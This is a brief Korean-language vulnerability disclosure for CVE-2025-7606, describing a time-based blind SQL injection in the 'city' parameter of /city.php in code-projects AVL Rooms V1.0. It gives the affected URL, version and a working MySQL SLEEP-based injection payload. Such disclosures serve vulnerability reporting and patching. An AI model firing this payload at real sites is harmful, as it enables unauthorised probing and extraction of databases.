
CVE-2025-7606에 대한 개념 증명 익스플로잇: code-projects AVL Rooms V1.0의 /city.php에서 시간 기반 블라인드 SQL 인젝션. MySQL SLEEP 기반 추출을 위한 페이로드를 포함합니다.
code-projects AVL Rooms Project V1.0/city.php SQL 인젝션
AVL Rooms
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/
dazhi
/city.php
V1.0
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/
city (GET)
유형: time-based blind
제목: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
페이로드: city=1' AND (SELECT 5303 FROM (SELECT(SLEEP(5)))kuAW) AND 'FOfS'='FOfS&date=07/13/2025